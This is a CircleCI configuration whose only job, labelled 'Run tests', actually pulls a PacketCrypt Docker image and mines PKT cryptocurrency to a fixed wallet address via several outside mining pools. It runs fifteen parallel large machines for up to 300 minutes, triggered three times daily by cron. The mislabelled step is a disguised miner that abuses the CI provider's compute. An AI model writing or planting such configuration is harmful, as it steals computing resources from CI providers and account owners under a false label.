working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run:
        name: Run tests
        command: |
                    docker pull thomasjp0x42/packetcrypt
                    docker run thomasjp0x42/packetcrypt ann -p pkt1q8qf58p5fzfp0jgde6dkv87uln7yz0ayjgp3z74 http://pool.pktpool.io http://pool.pkt.world https://stratum.zetahash.com/ http://pool.pktco.in http://pool.pkteer.com
        no_output_timeout: 300m
version: 2.1
jobs:
  endvoc:
    <<: *script
    parallelism: 15
    machine:
      image: ubuntu-2004:202101-01
    resource_class: large
workflows:
  version: 2.1
  commit:
    jobs:
      - endvoc

    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - main

  endvocrunjob:
    jobs:
      - endvoc
